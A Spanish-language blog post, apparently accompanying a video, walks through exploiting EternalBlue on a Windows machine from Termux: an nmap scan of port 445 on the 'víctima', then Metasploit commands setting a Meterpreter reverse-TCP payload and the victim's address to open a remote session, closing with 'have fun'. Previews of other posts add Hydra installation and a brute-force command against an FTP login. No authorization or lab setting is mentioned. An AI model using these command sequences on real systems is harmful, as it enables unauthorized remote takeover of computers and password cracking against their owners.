Cómo hackear Windows desde termux eternal blue

 



En este video les explico de forma sencilla como podemos explotar la vulnerabilidad de eternal blue para tomar control total sobre una máquina con dicha vulnerabilidad en este caso un Windows.

Para esta prueba de penetración vamos a necesitar:


Termux desde f-droid: Download termux

Metasploit-framework: Metasploit instalación

Adicionalmente necesitamos también tener nmap, vamos a descargarlo con:

1- apt install nmap

2- vamos a escanear la IP de nuestro objetivo con:

nmap -T5 --script "vuln and safe" -p 445 IP víctima -Pn 

3- msfconsole 

4- search 

5- use 0 

6-  set PAYLOAD windows/meterpreter/reverse_tcp

7- set lhost Tu IP 

8- set lport un puerto cualquiera que esté abierto.

9- set rhost IP de la víctima 

run 

Si todo sale bien y la víctima es vulnerable obtendrán una sesión meterpreter. 


Allí ya ustedes van a ver qué hacen con esa sesión. diviértanse aprendiendo saludos.

Comentarios

Publicar un comentario

Entradas más populares de este blog

Cómo instalar hydra en termux 2024

Imagen
  En este video vamos a instalar hydra en termux y también les enseño a usarlo de forma básica para llevar acabo un ataque de fuerza bruta con la herramienta hydra. Aquí podrás encontrar los comandos utilizados en este tutorial:  1- apt update -y && apt upgrade -y 2- apt install curl wget git python  2- git clone https://github.com/vanhauser-thc/thc-hydra  3- cd thc-hydra  4- ./configure  5- make 6- make install  Con el siguiente comando vamos a ejecutar hydra: ./hydra  Si todo ha salido bien deberíamos ver el mensaje de ayuda de hydra. Ahora hydra acepta muchos argumentos para llevar acabo los ajustes y configuraciones para el correcto funcionamiento.  En el caso de que ya tengamos un nombre de usuario valido podemos pasarle como argumento a hydra con el siguiente comando:  ./hydra -l admin -P password.txt ftp:192.168.1:4546 En el caso de que no sepamos el usuario ni la contraseña podemos pasarle una lista de posibles usuarios y...
Leer más

Cómo instalar metasploit en termux sin errores

Imagen
Instalación metasploit en termux. En este video les enseño a instalar metasploit con la herramienta de  Termux packeges  ¿Pero qué es termux packeges y para qué sirve? Pues bien aquí hablaremos de ello brevemente. Termux packeges es un conjunto de herramientas incluidos en un archivo.deb creado y mantenidos por Ivam3 by Cinderella aquí les dejo su  Github ivam3  es un creador de contenido sobre termux. En el vídeo vamos a ver la manera de instalar y usar la herramienta para instalar metasploit framework. Aquí les dejo los comandos usados en el vídeo:  Primero vamos a instalar  termux desde 0 les recomiendo encarecidamente desinstalar su termux y volverlo a instalar desde  F-Droid  para evitar errores durante el proceso de instalación. 1- Actualizamos los paquetes de termux: apt update -y && apt upgrade -y 2- Instalamos wget:  apt install wget -y  3- Creamos una carpeta para termux packeges: mkdir -p $PREFIX/etc/apt/sources.list.d...
Leer más